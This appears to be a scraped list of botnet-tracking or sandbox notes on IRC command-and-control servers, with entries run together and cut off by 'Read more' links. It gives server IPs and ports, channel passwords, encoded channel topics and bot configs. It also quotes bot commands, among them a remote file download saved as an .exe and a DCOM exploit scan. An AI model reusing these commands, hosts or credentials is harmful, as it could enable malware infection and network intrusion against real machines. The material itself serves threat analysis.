Outgoing ConnectionsTransport Protocol: TCPRemote Address: 69.65.19.125Remote Port: 6667Connection Established: 0Socket: 44 Is protected with Themida in order to prevent the sample from being reverse-engineered. Themida protection can potentially be used by a threat to complicate the manual threat analysis (e.g. the sample would not run under the Virtual Machine). A network-aware worm that uses knownRead more...
msnrulz.hi5photos.us
* Outgoing Connectionso Transport Protocol: TCPo Remote Address: 67.202.33.148o Remote Port: 1986o Connection Established: 0o Socket: 1668 dns=msnrulz.hi5photos.us DNS_TYPE_A 67.202.33.148 1idreaming.id.ohost.de DNS_TYPE_A Nick: [00|USA|166110]Username: XP-9269Joined Channel: #!mh! with Password r0xChannel Topic for Channel #!mh!: “D http://hi5gallery.com/images.php?= “Channel Topic for Channel #!mh!: “P http://hi5-image.us/gallery.php?= “Private Message to Channel #!mh!: “msn// Thread Activated: Sending Message.”Private Message toRead more...
Botnet server
Outgoing Connectionso Transport Protocol: TCPo Remote Address: 66.252.26.2o Remote Port: 6697o Connection Established: 0o Socket: 1656
Small network
78.129.221.118:1986Nick: [00|USA|241365]Username: XP-9968/j #!mh! r0xChannel Topic “P http://images-gallery.org/view.php?=”#!mh!: “msn// Thread Activated: Sending Message.”#!mh!: “msn// Thread Disabled.”[00|USA|241365]: “.login version -s”[00|USA|241365]: “.r.getfile http://file-photos.com/pcguard.jpg c:rtz.exe 1 -s”
x2skool.plisat.de
24.117.101.117 (4244)– DNS Queries:x2skool.plisat.de Nick: [00|USA|884551]Username: XP-9872Server Pass: letmeinJoined Channel: ##dR## with Password bole
bot server
122.169.201.162 (4244)Now talking in #opersChanMode hub.73.com sets mode +smntSMCuModes On #opers +smntSMCuNick: [00|USA|884551]Username: XP-9872Server Pass: letmeinJoined Channel: ##dR## with Password bole
big botnet server
* Topic is ‘=iqkqg3njjJWmdpQbp4KNBCMBhmBEGc3ox/G4OpXHWBwl5bUISmmIP5QDkH26P+sCVI1d+R2ekq9pBoyTlf8tF9U1GmAA73JkpAaGPLj/6rCm+gJ4A6DVoAVEEC84fRlOVNOI1MMhxeEyEssZOgwnUbtxF0lH3tq7ngfQI1AGUXG6AQMgCm32fvV8fbCneNBR5jMLIj5* Set by d3y2 on Sat Mar 14 11:54:02 * ipscan s.s.s.s dcom2 -slooks like very private* Connecting to 67.43.236.66 (8080)#m #las6 #foxNow talking in #m…[Topic On: [ #m ] [ =2cVeeCUXeV7+PRtm7KVLCQOPFRMaKuxfunDcHuIMKPOkAphgwlq96rdMrxDjCPCxeiVFZl5 ][Topic By: [ d3y2 ][Modes On: [ #m ] [ +smntSMCu ]
mirc bots server
[mirc]user=hExTeAm By Bo7aBtar email=teamnick=jamal[XP]60350anick=[XP-1359871]host=tcteam.ath.cxSERVER:tcteam.ath.cx:2006